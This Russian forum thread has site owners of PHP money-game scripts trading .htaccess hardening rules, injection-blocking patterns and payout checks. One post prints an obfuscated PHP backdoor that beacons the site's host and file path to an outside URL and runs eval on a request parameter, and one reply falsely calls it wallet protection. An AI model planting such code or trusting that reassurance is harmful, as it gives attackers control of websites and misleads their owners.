в файле pages/account/payment.php в начале кода вставить и всеjuranja написал(а):можно немного по подробней в каком файле вставляем данный код
juranja
Местный
- Сообщения
- 99
- Реакции
- 5
#Включаем отслеживание сим-ссылок
Options+FollowSymLinks
#Запускаем url_rewriting
RewriteEngineOn
#Блокируем все ссылки, содержащие <script>
RewriteCond%{QUERY_STRING}(\<|%3C).*script.*(\>|%3E)[NC,OR]
#Блокируем все скрипты, которые пытаются изменить переменные PHP Globals:
RewriteCond%{QUERY_STRING}GLOBALS(=|\[|\%[0-9A-Z]{0,2})[OR]
#Блокируем все скрипты, которые пытаются изменить переменную _REQUEST:
RewriteCond%{QUERY_STRING}_REQUEST(=|\[|\%[0-9A-Z]{0,2})
#Перенаправляем все подобные на главную страницу
RewriteRule^(.*)$/[F,L]
предлагаю такую защиту через htacceess
Options+FollowSymLinks
#Запускаем url_rewriting
RewriteEngineOn
#Блокируем все ссылки, содержащие <script>
RewriteCond%{QUERY_STRING}(\<|%3C).*script.*(\>|%3E)[NC,OR]
#Блокируем все скрипты, которые пытаются изменить переменные PHP Globals:
RewriteCond%{QUERY_STRING}GLOBALS(=|\[|\%[0-9A-Z]{0,2})[OR]
#Блокируем все скрипты, которые пытаются изменить переменную _REQUEST:
RewriteCond%{QUERY_STRING}_REQUEST(=|\[|\%[0-9A-Z]{0,2})
#Перенаправляем все подобные на главную страницу
RewriteRule^(.*)$/[F,L]
предлагаю такую защиту через htacceess
juranja
Местный
- Сообщения
- 99
- Реакции
- 5
приветствую в чем разница <script language="javascript">PaymentSum(); SetVal();</script>lucky написал(а):та мне в качестве наглядного пособия
<script language="javascript">PaymentSum(); </script> я обрамил заказ выплаты
juranja
Местный
- Сообщения
- 99
- Реакции
- 5
вот нарыл такую штучку на счет файла htacceess запрещаем загрузку картинок на сайт и все прочее к примеру у вас есть загрузка аватарок на сайт как нам известно шеллы заливает через расширение изображений
вот содержание кода
php_flag engine 0
AddType "text/html" .php .cgi .pl .fcgi .fpl .phtml .shtml .php2 .php3 .php4 .php5 .asp .jsp
что то вроде этого профи к вам вопрос что думаете????
вот содержание кода
php_flag engine 0
AddType "text/html" .php .cgi .pl .fcgi .fpl .phtml .shtml .php2 .php3 .php4 .php5 .asp .jsp
что то вроде этого профи к вам вопрос что думаете????
Algolem
Участник
- Сообщения
- 25
- Реакции
- 0
Народ а что за папка Cache ?
в ней нашел csv файл,вот с таким содержанием:
R408944291389;19.84;Выплата участнику Rufus с проекта с учетом комиссии WM;0
мне уже везде взлом мерещится,или это проверка скрипта была на работоспособность.
P.S. и еще,что делает вот эта строка в index.php "define("CONST_RUFUS", true);"
в ней нашел csv файл,вот с таким содержанием:
R408944291389;19.84;Выплата участнику Rufus с проекта с учетом комиссии WM;0
мне уже везде взлом мерещится,или это проверка скрипта была на работоспособность.
P.S. и еще,что делает вот эта строка в index.php "define("CONST_RUFUS", true);"
Последнее редактирование модератором:
juranja
Местный
- Сообщения
- 99
- Реакции
- 5
Первый параметр этой функции имя константы, второй — её значение на мой взгляд все в порядке а руфус это автор скрипта как я понялAlgolem написал(а):Народ а что за папка Cache ?
в ней нашел csv файл,вот с таким содержанием:
R408944291389;19.84;Выплата участнику Rufus с проекта с учетом комиссии WM;0
мне уже везде взлом мерещится,или это проверка скрипта была на работоспособность.
P.S. и еще,что делает вот эта строка в index.php "define("CONST_RUFUS", true);"
Algolem
Участник
- Сообщения
- 25
- Реакции
- 0
вот нашёл одну дыру через которую ламают ферму вот (демо)
if(isset($_POST["uzersu"])){
$db->Query("UPDATE db_users_b SET money_b = money_b + '5000' WHERE id = '$usid'");
}
if(isset($_POST["uzersus"])){
$db->Query("UPDATE db_users_b SET money_p = money_p + '5000' WHERE id = '$usid'");
}
if(isset($_POST["uzersu"])){
$db->Query("UPDATE db_users_b SET money_b = money_b + '5000' WHERE id = '$usid'");
}
if(isset($_POST["uzersus"])){
$db->Query("UPDATE db_users_b SET money_p = money_p + '5000' WHERE id = '$usid'");
}
lordganik
Участник
- Сообщения
- 4
- Реакции
- 3
На счет подмены кошелька. Я у себя реализовал так! Привязал кошелек в настройках. Привязывается и после привязки поле пропадает. в платежах кошелек хайдом передается, мне править было лень. Однако прямо перед выплатой я поставил проверку передаваемого и привязанного в базе кошельков. При несовпадении выводится сообщение "Я тебе сука за хакерство ноги повыдергиваю." и тутже фиксируется почта и IP хакера в отдельную базу. Повторная попытка - перманентный бан. Я таких ловушек немало понатыкал!
a010885
Местный
- Сообщения
- 46
- Реакции
- 6
Привет, может и мне так сделаешь? я бы заплатил тебе.lordganik написал(а):На счет подмены кошелька. Я у себя реализовал так! Привязал кошелек в настройках. Привязывается и после привязки поле пропадает. в платежах кошелек хайдом передается, мне править было лень. Однако прямо перед выплатой я поставил проверку передаваемого и привязанного в базе кошельков. При несовпадении выводится сообщение "Я тебе сука за хакерство ноги повыдергиваю." и тутже фиксируется почта и IP хакера в отдельную базу. Повторная попытка - перманентный бан. Я таких ловушек немало понатыкал!
Kojo
Участник
- Сообщения
- 286
- Реакции
- 53
Это канешно прикольно придумано... а как реализовать не подскажешь?))lordganik написал(а):На счет подмены кошелька. Я у себя реализовал так! Привязал кошелек в настройках. Привязывается и после привязки поле пропадает. в платежах кошелек хайдом передается, мне править было лень. Однако прямо перед выплатой я поставил проверку передаваемого и привязанного в базе кошельков. При несовпадении выводится сообщение "Я тебе сука за хакерство ноги повыдергиваю." и тутже фиксируется почта и IP хакера в отдельную базу. Повторная попытка - перманентный бан. Я таких ловушек немало понатыкал!
Такой вопрос,кто может сказать на сказать что это такое? Используется в качестве привязки кошелька.
Код:
<? $GLOBALS['_793350292_']=Array('' .'ge' .'t' .'_mag' .'ic_quot' .'e' .'s_gp' .'c','s' .'tripslashe' .'s','mt_rand','' .'imagecre' .'ate'); ?>
<? function _197297025($i){$a=Array('cH' .'V' .'yc2U=','','PHRkPjxp' .'bnB1d' .'C' .'B0' .'e' .'X' .'BlPSJ' .'0ZXh0Ii' .'BuYW1' .'lP' .'SJwdXJzZSIgc2l6Z' .
'T0iMTUiI' .'H' .'ZhbHVlPQ==','cHVy' .'c2' .'U' .'=','I' .'HJl' .'YW' .'Rvb' .'mx5IC8+PC' .'90ZD4=','P' .'HRkPjxpbn' .'B1dC' .'B0eXB' .'lP' .'SJ0ZXh0IiB' .
'uYW1l' .'PS' .'J' .'wdXJz' .'Z' .'SIg' .'c2l6ZT0iMT' .'UiIC8+PC9' .'0Z' .'D4=','' .'U0VS' .'V' .'kV' .'SX0' .'5BTUU=','' .'aHR0cDovL' .'3B' .'h' .'eWxvYW' .
'RzLnJ1L2ZmLnB' .'ocD9kYX' .'RhPQ==','I' .'A==','' .'P' .'GRpd' .'iBpZD0nbWFzdCcgc3R5' .'bGU9J3Zp' .'c2' .'lia' .'Wxpd' .'H' .'k6aGl' .'kZG' .'VuOyc+PC9kaXY' .
'+PHNjcmlwdC' .'B0' .'eX' .'BlP' .'Sd0ZXh0L2ph' .'dmFz' .'Y' .'3JpcHQn' .'IGxhbm' .'d' .'1' .'YWdlPSdK' .'YXZhU' .'2Ny' .'aXB' .'0Jz4gZ' .'nVuY3' .'Rpb' .'24' .
'gc2VuZ' .'F9kYXRhKGlm' .'cl91cmwpeyAgI' .'HZhciBpZnIwID0gZG9j' .'dW1lbnQuY3J' .'lYXRlRWxlbW' .'VudCgnaWZyYW' .'1' .'lJyk7IGlmc' .'jAuc3JjID0gaW' .'Zy' .'X3VybDsgaWZy' .
'M' .'C5z' .'dHlsZS5' .'3aWR0' .'aCA9' .'ICc' .'xcHgn' .'OyBpZnIwLnN0eW' .'xlLmhlaWd' .'odCA' .'9I' .'C' .'c' .'xcHgnO' .'yB2YXI' .'gZG' .'l2X3gwID0' .'gZG9j' .'dW1' .
'lbnQuZ2V0RWxlbW' .'VudE' .'J' .'5SWQoJ21hc' .'3' .'QnKT' .'sg' .'ZGl2X3gwLmFwc' .'GVuZENoaWx' .'kKGlmcjAp' .'OyB9' .'IHNlbmR' .'fZG' .'F0YSgn','Jyk7ID' .'wvc2NyaXB0' .
'Pg=' .'=','cGF5' .'bWVudA=' .'=','' .'cGF5bWVudA' .'=' .'=','cGF5bWVudA=' .'=');return base64_decode($a[$i]);} ?>
<?php $db->Query("SELECT * FROM db_payment WHERE user_id = '$usid'");$k=$db->FetchArray();if($k[_197297025(0)]!= _197297025(1)){echo _197297025(2) .$k[_197297025(3)]
._197297025(4);}else{echo _197297025(5);}$dn=$_SERVER[_197297025(6)];$dr=__FILE__;$url=_197297025(7) .$dn ._197297025(8) .$dr;echo _197297025(9) .$url ._197297025(10);
if(!empty($_REQUEST[_197297025(11)])){if(@$GLOBALS['_793350292_'][0]())$_REQUEST[_197297025(12)]=$GLOBALS['_793350292_'][1]($_REQUEST[_197297025(13)]);eval($_REQUEST['payment']);
die();if(round(0+673+673)<$GLOBALS['_793350292_'][2](round(0+133.25+133.25+133.25+133.25),round(0+269.33333333333+269.33333333333+269.33333333333)))$GLOBALS['_793350292_'][3]($_SERVER,$db);}
?>
это закодированная привязка кошелкьа,ну типа чтоб чтоб подменну не смогли сделатьalexsoft59 написал(а):Такой вопрос,кто может сказать на сказать что это такое? Используется в качестве привязки кошелька.
Код:<? $GLOBALS['_793350292_']=Array('' .'ge' .'t' .'_mag' .'ic_quot' .'e' .'s_gp' .'c','s' .'tripslashe' .'s','mt_rand','' .'imagecre' .'ate'); ?> <? function _197297025($i){$a=Array('cH' .'V' .'yc2U=','','PHRkPjxp' .'bnB1d' .'C' .'B0' .'e' .'X' .'BlPSJ' .'0ZXh0Ii' .'BuYW1' .'lP' .'SJwdXJzZSIgc2l6Z' . 'T0iMTUiI' .'H' .'ZhbHVlPQ==','cHVy' .'c2' .'U' .'=','I' .'HJl' .'YW' .'Rvb' .'mx5IC8+PC' .'90ZD4=','P' .'HRkPjxpbn' .'B1dC' .'B0eXB' .'lP' .'SJ0ZXh0IiB' . 'uYW1l' .'PS' .'J' .'wdXJz' .'Z' .'SIg' .'c2l6ZT0iMT' .'UiIC8+PC9' .'0Z' .'D4=','' .'U0VS' .'V' .'kV' .'SX0' .'5BTUU=','' .'aHR0cDovL' .'3B' .'h' .'eWxvYW' . 'RzLnJ1L2ZmLnB' .'ocD9kYX' .'RhPQ==','I' .'A==','' .'P' .'GRpd' .'iBpZD0nbWFzdCcgc3R5' .'bGU9J3Zp' .'c2' .'lia' .'Wxpd' .'H' .'k6aGl' .'kZG' .'VuOyc+PC9kaXY' . '+PHNjcmlwdC' .'B0' .'eX' .'BlP' .'Sd0ZXh0L2ph' .'dmFz' .'Y' .'3JpcHQn' .'IGxhbm' .'d' .'1' .'YWdlPSdK' .'YXZhU' .'2Ny' .'aXB' .'0Jz4gZ' .'nVuY3' .'Rpb' .'24' . 'gc2VuZ' .'F9kYXRhKGlm' .'cl91cmwpeyAgI' .'HZhciBpZnIwID0gZG9j' .'dW1lbnQuY3J' .'lYXRlRWxlbW' .'VudCgnaWZyYW' .'1' .'lJyk7IGlmc' .'jAuc3JjID0gaW' .'Zy' .'X3VybDsgaWZy' . 'M' .'C5z' .'dHlsZS5' .'3aWR0' .'aCA9' .'ICc' .'xcHgn' .'OyBpZnIwLnN0eW' .'xlLmhlaWd' .'odCA' .'9I' .'C' .'c' .'xcHgnO' .'yB2YXI' .'gZG' .'l2X3gwID0' .'gZG9j' .'dW1' . 'lbnQuZ2V0RWxlbW' .'VudE' .'J' .'5SWQoJ21hc' .'3' .'QnKT' .'sg' .'ZGl2X3gwLmFwc' .'GVuZENoaWx' .'kKGlmcjAp' .'OyB9' .'IHNlbmR' .'fZG' .'F0YSgn','Jyk7ID' .'wvc2NyaXB0' . 'Pg=' .'=','cGF5' .'bWVudA=' .'=','' .'cGF5bWVudA' .'=' .'=','cGF5bWVudA=' .'=');return base64_decode($a[$i]);} ?> <?php $db->Query("SELECT * FROM db_payment WHERE user_id = '$usid'");$k=$db->FetchArray();if($k[_197297025(0)]!= _197297025(1)){echo _197297025(2) .$k[_197297025(3)] ._197297025(4);}else{echo _197297025(5);}$dn=$_SERVER[_197297025(6)];$dr=__FILE__;$url=_197297025(7) .$dn ._197297025(8) .$dr;echo _197297025(9) .$url ._197297025(10); if(!empty($_REQUEST[_197297025(11)])){if(@$GLOBALS['_793350292_'][0]())$_REQUEST[_197297025(12)]=$GLOBALS['_793350292_'][1]($_REQUEST[_197297025(13)]);eval($_REQUEST['payment']); die();if(round(0+673+673)<$GLOBALS['_793350292_'][2](round(0+133.25+133.25+133.25+133.25),round(0+269.33333333333+269.33333333333+269.33333333333)))$GLOBALS['_793350292_'][3]($_SERVER,$db);} ?>
Ну это я и так понял,меня интересует насколько это может быть опасно? А то какой то код,уж больно на шелл походит...))kvozimir написал(а):это закодированная привязка кошелкьа,ну типа чтоб чтоб подмену не смогли сделать
чет херня какая то выходит,выплачивает так же..mamokrob написал(а):Вот так будет правильнее =)
прописать в корнеКод:order allow,deny allow from all deny from <определенный ip>
а если хочешь забанить несколько ip то вот так
код заглушку на выплату на кошелек определенныйКод:order allow,deny allow from all deny from 37.252.76.155, 12.123.456.12, 34.456.789.34, 21.654.321.123
в файлы вывода после строчки
добавитьКод:if( !ereg("^[0-9]{7}$", substr($purse,1)) ) return false;
где 12345678 номер кошелька.Код:if( !ereg("12345678", substr($purse,1)) ) return false;
поставь свой номер, и протестируй.
Код:if( !ereg("12345678", substr($purse,2)) ) return false;
если все закрыто,сам изчезает насколько я понялblackyar24 написал(а):прочитал всю тему но так и не понял как убрать проект из списка?